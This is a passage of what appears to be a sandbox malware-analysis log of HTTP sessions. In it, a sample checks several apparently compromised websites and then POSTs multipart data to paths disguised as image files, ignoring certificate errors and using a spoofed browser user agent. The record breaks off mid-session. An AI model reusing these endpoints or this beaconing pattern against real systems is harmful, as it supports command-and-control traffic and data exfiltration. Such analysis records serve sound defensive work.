Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = wpakademi.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #32
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name wpakademi.com
Server Port 80
Data Sent 255
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = wpakademi.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/imgs/esfuru.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = wpakademi.com/includes/imgs/esfuru.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #33
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.cakav.hu
Server Port 80
Data Sent 228
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.cakav.hu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.cakav.hu/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #34
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.cakav.hu
Server Port 80
Data Sent 259
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.cakav.hu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = news/pictures/heimammomees.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.cakav.hu/news/pictures/heimammomees.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #35
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.mimid.cz
Server Port 80
Data Sent 228
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.mimid.cz, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.mimid.cz/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #36
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.mimid.cz
Server Port 80
Data Sent 254
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.mimid.cz, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/pictures/rume.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.mimid.cz/uploads/pictures/rume.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #37
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 6chen.cn
Server Port 80
Data Sent 220
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 6chen.cn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 6chen.cn/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #38
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 6chen.cn
Server Port 80
Data Sent 248
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 6chen.cn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/tmp/dekedaso.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = 6chen.cn/wp-content/tmp/dekedaso.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #39
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name goodapd.website
Server Port 80
Data Sent 234
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = goodapd.website, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = goodapd.website/ False 1
Fn
HTTP Session #40
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name goodapd.website
Server Port 80
Data Sent 262
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = goodapd.website, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/image/sosede.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = goodapd.website/wp-content/image/sosede.png False 1
Fn
Close Session - True 58
Fn
HTTP Session #41
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name oceanlinen.com
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = oceanlinen.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = oceanlinen.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #42
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name oceanlinen.com
Server Port 80
Data Sent 264
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = oceanlinen.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/graphic/eskasomo.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = oceanlinen.com/wp-content/graphic/eskasomo.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #43
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name tommarmores.com.br
Server Port 80
Data Sent 240
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = tommarmores.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = tommarmores.com.br/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #44
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name tommarmores.com.br
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = tommarmores.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/assets/mokahe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = tommarmores.com.br/uploads/assets/mokahe.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #45
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name nesten.dk
Server Port 80
Data Sent 222
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = nesten.dk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = nesten.dk/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #46
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name nesten.dk
Server Port 80
Data Sent 249
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = nesten.dk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/images/sezumo.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = nesten.dk/includes/images/sezumo.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #47
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name zaeba.co.uk
Server Port 80
Data Sent 226
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = zaeba.co.uk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = zaeba.co.uk/ False 1
Fn
HTTP Session #48
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name zaeba.co.uk
Server Port 80
Data Sent 248
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = zaeba.co.uk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/tmp/sose.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = zaeba.co.uk/includes/tmp/sose.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #49
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.n2plus.co.th
Server Port 80
Data Sent 236
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.n2plus.co.th, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.n2plus.co.th/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #50
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.n2plus.co.th
Server Port 80
Data Sent 259
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.n2plus.co.th, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = news/assets/kadeka.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.n2plus.co.th/news/assets/kadeka.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #51
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name koloritplus.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = koloritplus.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = koloritplus.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #52
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name koloritplus.ru
Server Port 80
Data Sent 262
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = koloritplus.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/graphic/sokazu.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = koloritplus.ru/wp-content/graphic/sokazu.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #53
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name h5s.vn
Server Port 80
Data Sent 216
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = h5s.vn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = h5s.vn/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #54
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name h5s.vn
Server Port 80
Data Sent 241
Data Received 0
Operation Additional Information Success Count Logfile
